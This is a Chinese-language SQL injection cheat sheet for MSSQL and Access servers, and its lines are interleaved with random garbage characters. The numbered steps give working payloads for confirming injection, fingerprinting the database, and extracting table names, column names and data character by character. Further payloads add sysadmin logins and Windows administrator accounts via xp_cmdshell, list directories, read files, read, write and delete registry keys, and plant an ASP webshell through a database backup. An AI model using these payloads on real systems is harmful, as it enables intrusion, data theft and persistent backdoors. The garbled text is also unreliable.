1.判断是否有注入;and 1=1 ;and 1=2 ,3VG.u;U �
2.初步判断是否是mssql ;and user>0 /Qr��A�8��
ky'�|Wk6 �
3.注入参数是字符'and [查询条件] and ''=' ��}Q`/K;yq
/���lf\
E=
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �b%3Q$wIJ6
-�,R0�IGS�
5.判断数据库系统 +DicP��"~*
��!�aQ��Ih
;and (select count(*) from sysobjects)>0 mssql k!Vn4?B"k�
Q8 -3RgAw�
;and (select count(*) from msysobjects)>0 access ,"@w>WL�<9
@b]VCv0*f%
�I"��)� H~
M��{*kB2jr
6.猜数据库 ;and (select Count(*) from [数据库名])>0 `if�b<T���
d-�hb�vLn�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 IKv�d!,0xf
w|&��,I4["
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 vA�i�"�$e�
1T�!cc%ah�
9.(1)猜字段的ascii值(access) kX�igX��-�
�$=\d1%_R|
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 P\.W��Xe#j
]9�fS@SHdx
(2)猜字段的ascii值(mssql) _i-�\mR_~�
�{V�.W���k
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �D`V6&_.�p
l�r�Cm9�Oy
10.测试权限结构(mssql) mRwXN*�Izw
b([��:�,T7
\$'R+k-57;
�VxNX���d?
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <[bQo&B2 E
�z|�uOJ0uK
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- bi+�9�R-=&
hl`u�"�?rg
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7�@�JjjV�
Y^4q9?2��G
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- %WZ�$�]M?q
n4Vwao/9x
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Bu�&So|@TL
'[%jj�UU
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- #��?�_#!T|
U4]30B{;H�
;and 1=(select IS_MEMBER('db_owner'));--
�l@xW�Qj9
)���G���K+
U4=]#=�R~o
�s}�s�|~��
11.添加mssql和系统的帐户 -=5EbNPw�G
C�� B6A�}m
;exec master.dbo.sp_addlogin username;-- : g�5(�H�H
;exec master.dbo.sp_password null,username,password;-- �xg��?auje
:P�c(D�fkS
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- *�u}'}jC1X
��{aoM�JJq
;exec master.dbo.xp_cmdshell 'net user username password h�v3;irK]&
KyjyjfIw�H
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ea�p8*�ONl
���ubi~�%�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- hzq5�![/sV
�z4bN)W )p
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 7H4��L-J3
�w�E?Cv�L�
=x1�Wi�i$`
bf1)M>g,�O
12.(1)遍历目录 �5}
�G:D��
,[A�g�~.T
;create table dirs(paths varchar(100), id int) q~j�)W�$k�
U��oHd��-�
;insert dirs exec master.dbo.xp_dirtree 'c:\' i���*'Z3Z)
PYu�$1o9+N
;and (select top 1 paths from dirs)>0 �*Z�; r�
B
`UQEXoB)��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Yt�pRy%
�R
V:O�i�W"�/
GB�=bG�%Tb
>n��K%^�T
(2)遍历目录 L:pUvc�Ac?
Q(e{~
�]*
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ~;8I5�Sg�e
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��J�+|/-{g
V�9Hl1�\j^
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 $it�@>L8��
e^8�BV;+�c
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 WFem#hq��
G�c'M[9�Mh
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��AuXs B��
�l
sr�?b��
o,*=��$/or
</�=3g>9�Z
13.mssql中的存储过程 ^KbL�
,T
Bzw19�S6y�
xp_regenumvalues 注册表根键, 子键 1x{k�l01m%
\7 Gz\=\LR
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 #Kl}=� 1
4
nm�g�{�%�P
xp_regread 根键,子键,键值名 03_p�wB�)^
j8a��[
��(
;exec xp_regread *V�D��VC0R
=k_Uj�wgN^
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 qnXTNs
?�b
��{OP~8�e"
xp_regwrite 根键,子键, 值名, 值类型, 值 �\c%�g M1�
%K���l(>{N
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �ZLrHZhP-+
�h/?�6=D{�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ���9�`Vc��
S3�y246|�4
xp_regdeletevalue 根键,子键,值名 \=fh-c�(J,
+?A�W>&68y
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �`HyF_m>�\
:c:V%0�Yji
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �l9J*um�-�
��Ww`�&��i
AY8�8h��$a
M*`hD��d�S
14.mssql的backup创建webshell x.UaQ |��F
6|#g+�&�[
use model }�#/l��N�
vaB!R ��0
create table cmd(str image); D/:��3R�ZF
T�1zi0f�a'
insert into cmd(str) values (''); ix*�muVBj.
�f^e&hyC
�
backup database model to disk='c:\l.asp'; L�!y"�d!6C
���=:�~(m�
o;J;k_[M�X
��t�i2���
15.mssql内置函数 7 :U8 f:
I`�^Y�Abnb
;and (select @@version)>0 获得Windows的版本号 ��"�~\�*If
�fp;a5||5�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa WeVi]����n
9)�lZyE}��
;and (select user_name())>0 爆当前系统的连接用户 N!c
g��N
Uw� �<�{�i
;and (select db_name())>0 得到当前连接的数据库 ��hY=I5[*�
3�8�Ef�p$)
_yVP�pA[a
88o:NJ}�_�
16.简洁的webshell Z�i{0-m6+�
%�r��c�FT_
use model N`1��r;�%5
v3-?�C�Qb(
create table cmd(str image); =�D�Mb�z`t
ik��\S88|�
insert into cmd(str) values (''); �(.X�r#;\(
�zH=h�I�Vc
backup database model to disk='g:\wwwtest\l.asp';
